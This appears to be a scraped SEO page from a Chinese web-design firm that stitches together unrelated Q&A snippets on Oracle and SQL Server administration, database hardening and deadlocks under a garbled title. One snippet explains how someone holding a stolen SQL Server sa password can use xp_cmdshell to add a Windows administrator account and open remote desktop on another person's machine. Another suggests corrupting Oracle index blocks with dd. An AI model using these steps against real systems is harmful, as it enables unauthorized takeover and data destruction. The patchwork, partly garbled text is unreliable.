怎么破坏oracle 怎么破坏三座磐键-成都创新互联网站建设

关于创新互联

多方位宣传企业产品与服务 突出企业形象

公司简介 公司的服务 荣誉资质 新闻动态 联系我们

怎么破坏oracle 怎么破坏三座磐键

关于oracle数据库的问题

1、首先lsnrctl stop并不是停止数据库,只是将监听端口停止

喀什网站建设公司成都创新互联公司,喀什网站设计制作,有大型网站制作公司丰富经验。已为喀什上千家提供企业网站建设服务。企业网站搭建\成都外贸网站建设公司要多少钱,请找那个售后服务好的喀什做网站的公司定做!

2、你可以复制一份回去试试cp /oradata/data01/zhfz_tbs.dbf /oracle/product/10.2/oradata/ora10/zhfz_tbs.dbf

3、正确改变tablespaces文件位置的步骤,假设database是正常运行的:

a)

select TABLESPACE_NAME,FILE_NAME from dba_data_files order by TABLESPACE_NAME;

b)

alter tablespace TS01 read only;

alter tablespace TS01 offline;

!cp /data1/oracle/ts01_1.dbf /data2/oracle/ts01_2.dbf

alter database rename file '/data1/oracle/ts01_1.dbf' to '/data2/oracle/ts01_2.dbf';

alter tablespace TS01 online;

alter tablespace TS01 read write;

4、shutdown immediate如果还不行,你可以用shutdown abort命令强制停止,这个办法比较暴力,startup时候用startup mount,然后进行正确的改变tablespaces文件位置的步骤。

然后再alter database open;

让oracle数据库崩溃的sql语句

dml操作(insert , delete , update)之后,一定要使用commit或rollback命令来结束该事务,否则直接关闭sql plus,数据库默认rollback之前未提交的事务,所以今天你在select的时候 会显示未选定行。

而手动输入commit,rollback 这类的命令,是显示的提交事务(完成事务)。

如果在dml操作之后未及时显示的提交,而是又进行了ddl操作(create alter...),则数据库会隐式的提交之前未完成的事务。

所以 下次一定要注意哦~~

怎么把别人的数据库破坏

1. 怎样对数据库进行安全性保护

SQL Server 2000的安全配置在进行SQL Server 2000数据库的安全配置之前,首先你必须对操作系统进行安全配置,保证你的操作系统处于安全状态。

然后对你要使用的操作数据库软件(程序)进行必要的安全审核,比如对ASP、PHP等脚本,这是很多基于数据库的WEB应用常出现的安全隐患,对于脚本主要是一个过滤问题,需要过滤一些类似 , ‘ ; @ / 等字符,防止破坏者构造恶意的SQL语句。接着,安装SQL Server2000后请打上补丁sp1,sp2以及最新的sp3,sp4。

在做完上面三步基础之后,我们再来讨论SQL Server的安全配置。 1、使用安全的密码策略 我们把密码策略摆在所有安全配置的第一步,请注意,很多数据库帐号的密码过于简单,这跟系统密码过于简单是一个道理。

对于sa更应该注意,同时不要让sa帐号的密码写于应用程序或者脚本中。健壮的密码是安全的第一步!SQL Server2000安装的时候,如果是使用混合模式,那么就需要输入sa的密码,除非你确认必须使用空密码。

这比以前的版本有所改进。同时养成定期修改密码的好习惯。

数据库管理员应该定期查看是否有不符合密码要求的帐号。 比如使用下面的SQL语句: Use master Select name,Password from syslogins where password is null 2、使用安全的帐号策略 由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。

建议数据库管理员新建立个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。

SQL Server的认证模式有Windows身份认证和混合身份认证两种。如果数据库管理员不希望操作系统管理员来通过操作系统登陆来接触数据库的话,可以在帐号管理中把系统帐号“BUILTIN\Administrators”删除。

不过这样做的结果是一旦sa帐号忘记密码的话,就没有办法来恢复了。很多主机使用数据库应用只是用来做查询、修改等简单功能的,请根据实际需要分配帐号,并赋予仅仅能够满足应用要求和需要的权限。

比如,只要查询功能的,那么就使用一个简单的public帐号能够select就可以了。 3、加强数据库日志的记录 审核数据库登录事件的“失败和成功”,在实例属性中选择“安全性”,将其中的审核级别选定为全部,这样在数据库系统和操作系统日志里面,就详细记录了所有帐号的登录事件。

请定期查看SQL Server日志检查是否有可疑的登录事件发生,或者使用DOS命令。findstr /C:"登录" d:\Microsoft SQL Server\MSSQL\LOG\*.* 4、管理扩展存储过程 对存储过程进行大手术,并且对帐号调用扩展存储过程的权限要慎重。

其实在多数应用中根本用不到多少系统的存储过程,而SQL Server的这么多系统存储过程只是用来适应广大用户需求的,所以请删除不必要的存储过程,因为有些系统的存储过程能很容易地被人利用起来提升权限或进行破坏。如果你不需要扩展存储过程xp_cmdshell请把它去掉。

使用这个SQL语句: use master sp_dropextendedproc 'xp_cmdshell'xp_cmdshell是进入操作系统的最佳捷径,是数据库留给操作系统的一个大后门。如果你需要这个存储过程,请用这个语句也可以恢复过来。

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'如果你不需要请丢弃OLE自动存储过程(会造成管理器中的某些特征不能使用),这些过程包括如下: Sp_OACreate Sp_OADestroy Sp_OAGetErrorInfo Sp_OAGetPropertySp_OAMethod Sp_OASetProperty Sp_OAStop 去掉不需要的注册表访问的存储过程,注册表存储过程甚至能够读出操作系统管理员的密码来,如下: Xp_regaddmultistring Xp_regdeletekey Xp_regdeletevalue Xp_regenumvalues Xp_regread Xp_regremovemultistring Xp_regwrite还有一些其他的扩展存储过程,你也最好检查检查。在处理存储过程的时候,请确认一下,避免造成对数据库或应用程序的伤害。

5、使用协议加密 SQL Server 2000使用的Tabular Data Stream协议来进行网络数据交换,如果不加密的话,所有的网络传输都是明文的,包括密码、数据库内容等等,这是一个很大的安全威胁。能被人在网络中截获到他们需要的东西,包括数据库帐号和密码。

所以,在条件容许情况下,最好使用SSL来加密协议,当然,你需要一个证书来支持。 6、不要让人随便探测到你的TCP/IP端口 默认情况下,SQL Server使用1433端口监听,很多人都说SQL Server配置的时候要把这个端口改变,这样别人就不能很容易地知道使用的什么端口了。

可惜,通过微软未公开的1434端口的UDP探测可以很容易知道SQL Server使用的什么TCP/IP端口了。不过微软还是考虑到了这个问题,毕竟公开而且开放的端口会引起不必要的麻烦。

在实例属性中选择TCP/IP协议的属性。选择隐藏 SQL Server 实例。

如果隐藏了 SQL Server 实例,则将禁止对试图枚举网络上现有的 SQL Server 实例的客户端所发出的广播作出响应。

2. 知道别人的数据库密码 怎么进入别人的电脑 拿到管理员权限

可以的,回答以下问题:

1.是什么类型的数据库 mssql,mysql,oracle

2.得到的数据库用户是什么权限:sa,root,sysdba

如果是mssql并且拿到的是sa的密码,就相当于把对方电脑的管理员给你了:

远程连接它的数据库,然后执行以下sql语句:

EXEC xp_cmdshell ' user admin admin /add'

EXEC xp_cmdshell ' localgroup administrators admin /add'

上面两句执行完成,对方电脑里面就多了一个管理员admin

至于远程开3389,要echo一个reg文件在对方磁盘,然后通过上面的语句执行reg文件,可开,具体的就不说了。。

最后申明,以上方法只是学习,如果用于破坏,后果自负。

3. Oracle某个数据文件损坏如何打开数据库

系统环境: 1、操作系统:Windows 2000 Server,机器内存128M 2、数据库: Oracle 8i R2 (8。

1。6) for NT 企业版 3、安装路径:C:\ORACLE 错误现象: 因误操作,数据库中某一数据文件被误删, 控制面板的Oracle相关服务显示已启动,但用SQL*Plus无法连接, 显示以下错误 ORA-01033: ORACLE initialization or shutdown in progress 模拟现象: create tablespace test datafile 'c:\test。

ora' size 5M AUTOEXTEND ON NEXT 1M MAXSIZE UNLIMITED default storage (initial 128K next 1M pctincrease 0) / 关闭所有服务stop。 bat stop "OracleWebAssistant0" stop "OracleOraHome81TNSListener" stop "OracleServiceORADB" shutdown 在操作系统中删除test。

ora文件 重新启动服务start。bat start "OracleWebAssistant0" start "OracleOraHome81TNSListener" start "OracleServiceORADB" 服务里OracleServiceORADB显示已启动,但用SQL*Plus无法连接, 显示ORA-01033: ORACLE initialization or shutdown in progress 解决方法: 先让该数据文件脱机,就可以打开数据库 C:\svrmgrl svrmgrlconnect internal svrmgrlshutdown svrmgrlstartup mount --ARCHIVELOG模式命令,文件名要大写 svrmgrlalter database datafile 'C:\TEST。

ORA' offline; --NOARCHIVELOG模式命令 svrmgrlalter database datafile 'C:\TEST。 ORA' offline drop; svrmgrlalter database open; --查询数据文件联、脱机状态 SQL select file#,name,status from v$datafile; SQL drop tablespace test; 表空间已丢弃。

4. 如何保护数据库

数据库系统的安全除依赖自身内部的安全机制外,还与外部网络环境、应用环境、从业人员素质等因素息息相关,因此,从广义上讲,数据库系统的安全框架可以划分为三个层次: ⑴ 网络系统层次; ⑵ 宿主操作系统层次; ⑶ 数据库管理系统层次。

这三个层次构筑成数据库系统的安全体系,与数据安全的关系是逐步紧密的,防范的重要性也逐层加强,从外到内、由表及里保证数据的安全。下面就安全框架的三个层次展开论述。

2. 网络系统层次安全技术 从广义上讲,数据库的安全首先倚赖于网络系统。随着Inter的发展普及,越来越多的公司将其核心业务向互联网转移,各种基于网络的数据库应用系统如雨后春笋般涌现出来,面向网络用户提供各种信息服务。

可以说网络系统是数据库应用的外部环境和基础,数据库系统要发挥其强大作用离不开网络系统的支持,数据库系统的用户(如异地用户、分布式用户)也要通过网络才能访问数据库的数据。网络系统的安全是数据库安全的第一道屏障,外部入侵首先就是从入侵网络系统开始的。

网络入侵试图破坏信息系统的完整性、机密性或可信任的任何网络活动的 *** ,具有以下特点: a)没有地域和时间的限制,跨越国界的攻击就如同在现场一样方便; b)通过网络的攻击往往混杂在大量正常的网络活动之中,隐蔽性强; c)入侵手段更加隐蔽和复杂。 计算机网络系统开放式环境面临的威胁主要有以下几种类型:a)欺骗(Masquerade);b)重发(Replay);c)报文修改(Modification of message);d)拒绝服务(Deny of service);e)陷阱门(Trapdoor);f)特洛伊木马(Trojan horse);g)攻击如透纳攻击(Tunneling Attack)、应用软件攻击等。

这些安全威胁是无时、无处不在的,因此必须采取有效的措施来保障系统的安全。 从技术角度讲,网络系统层次的安全防范技术有很多种,大致可以分为防火墙、入侵检测、协作式入侵检测技术等。

⑴防火墙。防火墙是应用最广的一种防范技术。

作为系统的第一道防线,其主要作用是监控可信任网络和不可信任网络之间的访问通道,可在内部与外部网络之间形成一道防护屏障,拦截来自外部的非法访问并阻止内部信息的外泄,但它无法阻拦来自网络内部的非法操作。它根据事先设定的规则来确定是否拦截信息流的进出,但无法动态识别或自适应地调整规则,因而其智能化程度很有限。

防火墙技术主要有三种:数据包过滤器(packet filter)、代理(proxy)和状态分析(stateful inspection)。现代防火墙产品通常混合使用这几种技术。

⑵入侵检测。入侵检测(IDS-- Instrusion Detection System)是近年来发展起来的一种防范技术,综合采用了统计技术、规则方法、网络通信技术、人工智能、密码学、推理等技术和方法,其作用是监控网络和计算机系统是否出现被入侵或滥用的征兆。

1987年,Derothy Denning首次提出了一种检测入侵的思想,经过不断发展和完善,作为监控和识别攻击的标准解决方案,IDS系统已经成为安全防御系统的重要组成部分。 入侵检测采用的分析技术可分为三大类:签名、统计和数据完整性分析法。

①签名分析法。主要用来监测对系统的已知弱点进行攻击的行为。

人们从攻击模式中归纳出它的签名,编写到IDS系统的代码里。签名分析实际上是一种模板匹配操作。

②统计分析法。以统计学为理论基础,以系统正常使用情况下观察到的动作模式为依据来判别某个动作是否偏离了正常轨道。

③数据完整性分析法。以密码学为理论基础,可以查证文件或者对象是否被别人修改过。

IDS的种类包括基于网络和基于主机的入侵监测系统、基于特征的和基于非正常的入侵监测系统、实时和非实时的入侵监测系统等。 ⑶协作式入侵监测技术 独立的入侵监测系统不能够对广泛发生的各种入侵活动都做出有效的监测和反应,为了弥补独立运作的不足,人们提出了协作式入侵监测系统的想法。

在协作式入侵监测系统中,IDS基于一种统一的规范,入侵监测组件之间自动地交换信息,并且通过信息的交换得到了对入侵的有效监测,可以应用于不同的网络环境。 3. 宿主操作系统层次安全技术 操作系统是大型数据库系统的运行平台,为数据库系统提供一定程度的安全保护。

目前操作系统平台大多数集中在Windows NT 和Unix,安全级别通常为C1、C2级。主要安全技术有操作系统安全策略、安全管理策略、数据安全等方面。

操作系统安全策略用于配置本地计算机的安全设置,包括密码策略、账户锁定策略、审核策略、IP安全策略、用户权利指派、加密数据的恢复代理以及其它安全选项[7]。具体可以体现在用户账户、口令、访问权限、审计等方面。

用户账户:用户访问系统的"身份证",只有合法用户才有账户。 口令:用户的口令为用户访问系统提供一道验证。

访问权限:规定用户的权限。 审计:对用户的行为进行跟踪和记录,便于系统管理员分析系统的访问情况以及事后的追查使用。

安全管理策略是指网络管理员对系统实施安全管理所采取的方法及策略。针对不同的操作系统、网络环境需要采取的安全管理策略一般也不尽相同,其核心是保证服务器的安全。

Oracle 等待资源时检测到死锁,怎么破?

所谓死锁:是指两个或两个以上的进程在执行过程中,因争夺资源而造成的一种互相等待的现象,若无外力作用,它们都将无法推进下去。此时称系统处于死锁状态或系统产生了死锁,这些永远在互相等待的进程称为死锁进程。由于资源占用是互斥的,当某个进程提出申请资源后,使得有关进程在无外力协助下,永远分配不到必需的资源而无法继续运行,这就产生了一种特殊现象死锁。虽然进程在运行过程中,可能发生死锁,但死锁的发生也必须具备一定的条件,死锁的发生必须具备以下四个必要条件。1)互斥条件:指进程对所分配到的资源进行排它性使用,即在一段时间内某资源只由一个进程占用。如果此时还有其它进程请求资源,则请求者只能等待,直至占有资源的进程用毕释放。2)请求和保持条件:指进程已经保持至少一个资源,但又提出了新的资源请求,而该资源已被其它进程占有,此时请求进程阻塞,但又对自己已获得的其它资源保持不放。3)不剥夺条件:指进程已获得的资源,在未使用完之前,不能被剥夺,只能在使用完时由自己释放。4)环路等待条件:指在发生死锁时,必然存在一个进程——资源的环形链,即进程集合{P0,P1,P2,···,Pn}中的P0正在等待一个P1占用的资源;P1正在等待P2占用的资源,……,Pn正在等待已被P0占用的资源。在系统中已经出现死锁后,应该及时检测到死锁的发生,并采取适当的措施来解除死锁。目前处理死锁的方法可归结为以下四种:1) 预防死锁。这是一种较简单和直观的事先预防的方法。方法是通过设置某些限制条件,去破坏产生死锁的四个必要条件中的一个或者几个,来预防发生死锁。预防死锁是一种较易实现的方法,已被广泛使用。但是由于所施加的限制条件往往太严格,可能会导致系统资源利用率和系统吞吐量降低。2) 避免死锁。该方法同样是属于事先预防的策略,但它并不须事先采取各种限制措施去破坏产生死锁的的四个必要条件,而是在资源的动态分配过程中,用某种方法去防止系统进入不安全状态,从而避免发生死锁。3)检测死锁。这种方法并不须事先采取任何限制性措施,也不必检查系统是否已经进入不安全区,此方法允许系统在运行过程中发生死锁。但可通过系统所设置的检测机构,及时地检测出死锁的发生,并精确地确定与死锁有关的进程和资源,然后采取适当措施,从系统中将已发生的死锁清除掉。4)解除死锁。这是与检测死锁相配套的一种措施。当检测到系统中已发生死锁时,须将进程从死锁状态中解脱出来。常用的实施方法是撤销或挂起一些进程,以便回收一些资源,再将这些资源分配给已处于阻塞状态的进程,使之转为就绪状态,以继续运行。死锁的检测和解除措施,有可能使系统获得较好的资源利用率和吞吐量,但在实现上难度也最大。

Oracle 如何破坏一个索引

1.不想用索引你可以让他失效,为什么要破坏它?

2.你想把它破坏成什么样?

3.如果实在想破坏它,恰巧你用的是unix操作系统,就用 dd 写这索引的其中几个块,就可以破坏它


新闻名称:怎么破坏oracle 怎么破坏三座磐键
网页URL:http://kswsj.cn/article/hgeesj.html

其他资讯